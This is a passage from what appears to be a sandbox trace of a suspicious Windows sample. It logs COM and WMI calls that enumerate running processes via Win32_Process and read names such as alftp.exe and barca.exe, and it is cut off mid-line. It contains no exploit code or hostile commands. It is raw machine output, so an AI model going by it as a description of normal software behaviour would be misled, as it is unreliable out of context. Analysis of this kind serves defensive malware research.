varVal2=0x0), pType=0x36f21c*=0, plFlavor=0x36f218*=0 | out: pVal=0x36f198*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2988\"", varVal2=0x0), pType=0x36f21c*=8, plFlavor=0x36f218*=64) returned 0x0 [0224.905] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2988\"") returned 0x66 [0224.905] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2988\"") returned 0x66 [0224.905] CoGetObjectContext (in: riid=0x2414360*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x36f1c4 | out: ppv=0x36f1c4*=0x6ee4bc) returned 0x0 [0224.906] IComThreadingInfo:GetCurrentApartmentType (in: This=0x6ee4bc, pAptType=0x36f1bc | out: pAptType=0x36f1bc*=1) returned 0x0 [0224.906] IUnknown:QueryInterface (in: This=0x6ee4bc, riid=0x2414348*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x36f1c0 | out: ppvObject=0x36f1c0*=0x0) returned 0x80004002 [0224.906] IUnknown:Release (This=0x6ee4bc) returned 0x1 [0224.907] CoGetClassObject (in: rclsid=0x761ab4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x71ea6bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x36eb30 | out: ppv=0x36eb30*=0x5e8d068) returned 0x0 [0224.907] WbemDefPath:IUnknown:QueryInterface (in: This=0x5e8d068, riid=0x71e6dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x36ed48 | out: ppvObject=0x36ed48*=0x0) returned 0x80004002 [0224.907] WbemDefPath:IClassFactory:CreateInstance (in: This=0x5e8d068, pUnkOuter=0x0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36ed54 | out: ppvObject=0x36ed54*=0x5eb82d8) returned 0x0 [0224.907] WbemDefPath:IUnknown:Release (This=0x5e8d068) returned 0x0 [0224.907] WbemDefPath:IUnknown:QueryInterface (in: This=0x5eb82d8, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e974 | out: ppvObject=0x36e974*=0x5eb82d8) returned 0x0 [0224.907] WbemDefPath:IUnknown:QueryInterface (in: This=0x5eb82d8, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x36e928 | out: ppvObject=0x36e928*=0x0) returned 0x80004002 [0224.907] WbemDefPath:IUnknown:AddRef (This=0x5eb82d8) returned 0x3 [0224.907] WbemDefPath:IUnknown:QueryInterface (in: This=0x5eb82d8, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x36e284 | out: ppvObject=0x36e284*=0x0) returned 0x80004002 [0224.908] WbemDefPath:IUnknown:QueryInterface (in: This=0x5eb82d8, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x36e234 | out: ppvObject=0x36e234*=0x0) returned 0x80004002 [0224.908] WbemDefPath:IUnknown:QueryInterface (in: This=0x5eb82d8, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e240 | out: ppvObject=0x36e240*=0x5e8d078) returned 0x0 [0224.908] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x5e8d078, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x36e248 | out: pCid=0x36e248*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0224.908] WbemDefPath:IUnknown:Release (This=0x5e8d078) returned 0x3 [0224.908] CoGetContextToken (in: pToken=0x36e2a0 | out: pToken=0x36e2a0) returned 0x0 [0224.908] CoGetContextToken (in: pToken=0x36e6b4 | out: pToken=0x36e6b4) returned 0x0 [0224.908] WbemDefPath:IUnknown:QueryInterface (in: This=0x5eb82d8, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e734 | out: ppvObject=0x36e734*=0x0) returned 0x80004002 [0224.908] WbemDefPath:IUnknown:Release (This=0x5eb82d8) returned 0x2 [0224.908] WbemDefPath:IUnknown:Release (This=0x5eb82d8) returned 0x1 [0224.908] CoGetContextToken (in: pToken=0x36f044 | out: pToken=0x36f044) returned 0x0 [0224.908] CoGetContextToken (in: pToken=0x36efa4 | out: pToken=0x36efa4) returned 0x0 [0224.908] WbemDefPath:IUnknown:QueryInterface (in: This=0x5eb82d8, riid=0x36f074*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x36f070 | out: ppvObject=0x36f070*=0x5eb82d8) returned 0x0 [0224.908] WbemDefPath:IUnknown:AddRef (This=0x5eb82d8) returned 0x3 [0224.908] WbemDefPath:IUnknown:Release (This=0x5eb82d8) returned 0x2 [0224.908] WbemDefPath:IWbemPath:SetText (This=0x5eb82d8, uMode=0x4, pszPath="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2988\"") returned 0x0 [0224.908] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x768a58, puCount=0x36f1f0 | out: puCount=0x36f1f0*=0x2) returned 0x0 [0224.908] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1ec*=0x0, pszText=0x0 | out: puBuffLength=0x36f1ec*=0xf, pszText=0x0) returned 0x0 [0224.908] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1ec*=0xf, pszText="00000000000000" | out: puBuffLength=0x36f1ec*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0224.908] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x768a58, puCount=0x36f1bc | out: puCount=0x36f1bc*=0x2) returned 0x0 [0224.908] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1b8*=0x0, pszText=0x0 | out: puBuffLength=0x36f1b8*=0xf, pszText=0x0) returned 0x0 [0224.908] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1b8*=0xf, pszText="00000000000000" | out: puBuffLength=0x36f1b8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0224.909] IWbemClassObject:Get (in: This=0x7436f8, wszName="Name", lFlags=0, pVal=0x36f1b8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x26ecc1c*=0, plFlavor=0x26ecc20*=0 | out: pVal=0x36f1b8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="alftp.exe", varVal2=0x0), pType=0x26ecc1c*=8, plFlavor=0x26ecc20*=0) returned 0x0 [0224.909] SysStringByteLen (bstr="alftp.exe") returned 0x12 [0224.909] SysStringByteLen (bstr="alftp.exe") returned 0x12 [0224.909] IWbemClassObject:Get (in: This=0x7436f8, wszName="Name", lFlags=0, pVal=0x36f1c0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x26ecc1c*=8, plFlavor=0x26ecc20*=0 | out: pVal=0x36f1c0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="alftp.exe", varVal2=0x0), pType=0x26ecc1c*=8, plFlavor=0x26ecc20*=0) returned 0x0 [0224.909] SysStringByteLen (bstr="alftp.exe") returned 0x12 [0224.909] SysStringByteLen (bstr="alftp.exe") returned 0x12 [0224.909] CoTaskMemAlloc (cb=0x4) returned 0x5e8d0a8 [0224.909] IEnumWbemClassObject:Next (in: This=0x70f9f0, lTimeout=-1, uCount=0x1, apObjects=0x5e8d0a8, puReturned=0x26dde18 | out: apObjects=0x5e8d0a8*=0x743890, puReturned=0x26dde18*=0x1) returned 0x0 [0224.946] IUnknown:QueryInterface (in: This=0x743890, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e81c | out: ppvObject=0x36e81c*=0x743890) returned 0x0 [0224.946] IUnknown:QueryInterface (in: This=0x743890, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x36e7d0 | out: ppvObject=0x36e7d0*=0x0) returned 0x80004002 [0224.947] IUnknown:QueryInterface (in: This=0x743890, riid=0x71e41e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x36e5f8 | out: ppvObject=0x36e5f8*=0x0) returned 0x80004002 [0224.947] IUnknown:AddRef (This=0x743890) returned 0x3 [0224.947] IUnknown:QueryInterface (in: This=0x743890, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x36e12c | out: ppvObject=0x36e12c*=0x0) returned 0x80004002 [0224.947] IUnknown:QueryInterface (in: This=0x743890, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x36e0dc | out: ppvObject=0x36e0dc*=0x0) returned 0x80004002 [0224.947] IUnknown:QueryInterface (in: This=0x743890, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e0e8 | out: ppvObject=0x36e0e8*=0x743894) returned 0x0 [0224.948] IMarshal:GetUnmarshalClass (in: This=0x743894, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x36e0f0 | out: pCid=0x36e0f0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0224.948] IUnknown:Release (This=0x743894) returned 0x3 [0224.948] CoGetContextToken (in: pToken=0x36e148 | out: pToken=0x36e148) returned 0x0 [0224.948] CoGetContextToken (in: pToken=0x36e55c | out: pToken=0x36e55c) returned 0x0 [0224.948] IUnknown:QueryInterface (in: This=0x743890, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e5dc | out: ppvObject=0x36e5dc*=0x0) returned 0x80004002 [0224.948] IUnknown:Release (This=0x743890) returned 0x2 [0224.948] CoGetContextToken (in: pToken=0x36eb44 | out: pToken=0x36eb44) returned 0x0 [0224.949] CoGetContextToken (in: pToken=0x36eaa4 | out: pToken=0x36eaa4) returned 0x0 [0224.949] IUnknown:QueryInterface (in: This=0x743890, riid=0x36eb74*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x36eb70 | out: ppvObject=0x36eb70*=0x743890) returned 0x0 [0224.949] IUnknown:AddRef (This=0x743890) returned 0x4 [0224.949] IUnknown:Release (This=0x743890) returned 0x3 [0224.949] IUnknown:Release (This=0x743890) returned 0x2 [0224.949] CoTaskMemFree (pv=0x5e8d0a8) [0224.949] CoGetContextToken (in: pToken=0x36eeb4 | out: pToken=0x36eeb4) returned 0x0 [0224.949] IUnknown:AddRef (This=0x743890) returned 0x3 [0224.949] IWbemClassObject:Get (in: This=0x743890, wszName="__GENUS", lFlags=0, pVal=0x36f1b4*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x36f234*=0, plFlavor=0x36f230*=0 | out: pVal=0x36f1b4*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x36f234*=3, plFlavor=0x36f230*=64) returned 0x0 [0224.950] IWbemClassObject:Get (in: This=0x743890, wszName="__PATH", lFlags=0, pVal=0x36f198*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x36f21c*=0, plFlavor=0x36f218*=0 | out: pVal=0x36f198*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2996\"", varVal2=0x0), pType=0x36f21c*=8, plFlavor=0x36f218*=64) returned 0x0 [0224.950] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2996\"") returned 0x66 [0224.950] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2996\"") returned 0x66 [0224.950] CoGetObjectContext (in: riid=0x2414360*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x36f1c4 | out: ppv=0x36f1c4*=0x6ee4bc) returned 0x0 [0224.950] IComThreadingInfo:GetCurrentApartmentType (in: This=0x6ee4bc, pAptType=0x36f1bc | out: pAptType=0x36f1bc*=1) returned 0x0 [0224.950] IUnknown:QueryInterface (in: This=0x6ee4bc, riid=0x2414348*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x36f1c0 | out: ppvObject=0x36f1c0*=0x0) returned 0x80004002 [0224.950] IUnknown:Release (This=0x6ee4bc) returned 0x1 [0224.951] CoGetClassObject (in: rclsid=0x761ab4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x71ea6bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x36eb30 | out: ppv=0x36eb30*=0x5e8d0a8) returned 0x0 [0224.952] WbemDefPath:IUnknown:QueryInterface (in: This=0x5e8d0a8, riid=0x71e6dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x36ed48 | out: ppvObject=0x36ed48*=0x0) returned 0x80004002 [0224.952] WbemDefPath:IClassFactory:CreateInstance (in: This=0x5e8d0a8, pUnkOuter=0x0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36ed54 | out: ppvObject=0x36ed54*=0x5eb83b8) returned 0x0 [0224.952] WbemDefPath:IUnknown:Release (This=0x5e8d0a8) returned 0x0 [0224.952] WbemDefPath:IUnknown:QueryInterface (in: This=0x5eb83b8, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e974 | out: ppvObject=0x36e974*=0x5eb83b8) returned 0x0 [0224.952] WbemDefPath:IUnknown:QueryInterface (in: This=0x5eb83b8, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x36e928 | out: ppvObject=0x36e928*=0x0) returned 0x80004002 [0224.952] WbemDefPath:IUnknown:AddRef (This=0x5eb83b8) returned 0x3 [0224.952] WbemDefPath:IUnknown:QueryInterface (in: This=0x5eb83b8, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x36e284 | out: ppvObject=0x36e284*=0x0) returned 0x80004002 [0224.952] WbemDefPath:IUnknown:QueryInterface (in: This=0x5eb83b8, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x36e234 | out: ppvObject=0x36e234*=0x0) returned 0x80004002 [0224.953] WbemDefPath:IUnknown:QueryInterface (in: This=0x5eb83b8, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e240 | out: ppvObject=0x36e240*=0x5e8d0b8) returned 0x0 [0224.953] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x5e8d0b8, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x36e248 | out: pCid=0x36e248*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0224.953] WbemDefPath:IUnknown:Release (This=0x5e8d0b8) returned 0x3 [0224.953] CoGetContextToken (in: pToken=0x36e2a0 | out: pToken=0x36e2a0) returned 0x0 [0224.953] CoGetContextToken (in: pToken=0x36e6b4 | out: pToken=0x36e6b4) returned 0x0 [0224.953] WbemDefPath:IUnknown:QueryInterface (in: This=0x5eb83b8, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e734 | out: ppvObject=0x36e734*=0x0) returned 0x80004002 [0224.953] WbemDefPath:IUnknown:Release (This=0x5eb83b8) returned 0x2 [0224.953] WbemDefPath:IUnknown:Release (This=0x5eb83b8) returned 0x1 [0224.953] CoGetContextToken (in: pToken=0x36f044 | out: pToken=0x36f044) returned 0x0 [0224.953] CoGetContextToken (in: pToken=0x36efa4 | out: pToken=0x36efa4) returned 0x0 [0224.953] WbemDefPath:IUnknown:QueryInterface (in: This=0x5eb83b8, riid=0x36f074*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x36f070 | out: ppvObject=0x36f070*=0x5eb83b8) returned 0x0 [0224.953] WbemDefPath:IUnknown:AddRef (This=0x5eb83b8) returned 0x3 [0224.953] WbemDefPath:IUnknown:Release (This=0x5eb83b8) returned 0x2 [0224.953] WbemDefPath:IWbemPath:SetText (This=0x5eb83b8, uMode=0x4, pszPath="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2996\"") returned 0x0 [0224.953] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x768a58, puCount=0x36f1f0 | out: puCount=0x36f1f0*=0x2) returned 0x0 [0224.953] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1ec*=0x0, pszText=0x0 | out: puBuffLength=0x36f1ec*=0xf, pszText=0x0) returned 0x0 [0224.953] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1ec*=0xf, pszText="00000000000000" | out: puBuffLength=0x36f1ec*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0224.954] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x768a58, puCount=0x36f1bc | out: puCount=0x36f1bc*=0x2) returned 0x0 [0224.954] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1b8*=0x0, pszText=0x0 | out: puBuffLength=0x36f1b8*=0xf, pszText=0x0) returned 0x0 [0224.954] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1b8*=0xf, pszText="00000000000000" | out: puBuffLength=0x36f1b8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0224.954] IWbemClassObject:Get (in: This=0x743890, wszName="Name", lFlags=0, pVal=0x36f1b8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x26ed480*=0, plFlavor=0x26ed484*=0 | out: pVal=0x36f1b8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="barca.exe", varVal2=0x0), pType=0x26ed480*=8, plFlavor=0x26ed484*=0) returned 0x0 [0224.954] SysStringByteLen (bstr="barca.exe") returned 0x12 [0224.954] SysStringByteLen (bstr="barca.exe") returned 0x12 [0224.954] IWbemClassObject:Get (in: This=0x743890, wszName="Name", lFlags=0, pVal=0x36f1c0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x26ed480*=8, plFlavor=0x26ed484*=0 | out: pVal=0x36f1c0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="barca.exe", varVal2=0x0), pType=0x26ed480*=8, plFlavor=0x26ed484*=0) returned 0x0 [0224.954] SysStringByteLen (bstr="barca.exe") returned 0x12 [0224.954] SysStringByteLen (bstr="barca.exe") returned 0x12 [0224.954] CoTaskMemAlloc (cb=0x4) returned 0x5e8d0e8 [0224.954] IEnumWbemClassObject:Next (in: This=0x70f9f0, lTimeout=-1, uCount=0x1, apObjects=0x5e8d0e8, puReturned=0x26dde18 | out: apObjects=0x5e8d0e8*=0x743a28, puReturned=0x26dde18*=0x1) returned 0x0 [0224.955] IUnknown:QueryInterface (in: This=0x743a28, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e81c | out: ppvObject=0x36e81c*=0x743a28) returned 0x0 [0224.955] IUnknown:QueryInterface (in: This=0x743a28, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x36e7d0 | out: ppvObject=0x36e7d0*=0x0) returned 0x80004002 [0224.955] IUnknown:QueryInterface (in: This=0x743a28, riid=0x71e41e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x36e5f8 | out: ppvObject=0x36e5f8*=0x0) returned 0x80004002 [0224.956] IUnknown:AddRef (This=0x743a28) returned 0x3 [0224.956] IUnknown:QueryInterface (in: This=0x743a28, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x36e12c | out: ppvObject=0x36e12c*=0x0) returned 0x80004002 [0224.956] IUnknown:QueryInterface (in: This=0x743a28, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x36e0dc | out: ppvObject=0x36e0dc*=0x0) returned 0x80004002 [0224.956] IUnknown:QueryInterface (in: This=0x743a28, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e0e8 | out: ppvObject=0x36e0e8*=0x743a2c) returned 0x0 [0224.956] IMarshal:GetUnmarshalClass (in: This=0x743a2c, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x36e0f0 | out: pCid=0x36e0f0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0224.956] IUnknown:Release (This=0x743a2c) returned 0x3 [0224.956] CoGetContextToken (in: pToken=0x36e148 | out: pToken=0x36e148) returned 0x0 [0224.956] CoGetContextToken (in: pToken=0x36e55c | out: pToken=0x36e55c) returned 0x0 [0224.956] IUnknown:QueryInterface (in: This=0x743a28, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e5dc | out: ppvObject=0x36e5dc*=0x0) returned 0x80004002 [0224.956] IUnknown:Release (This=0x743a28) returned 0x2 [0224.956] CoGetContextToken (in: pToken=0x36eb44 | out: pToken=0x36eb44) returned 0x0 [0224.956] CoGetContextToken (in: pToken=0x36eaa4 | out: pToken=0x36eaa4) returned 0x0 [0224.956] IUnknown:QueryInterface (in: This=0x743a28, riid=0x36eb74*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, 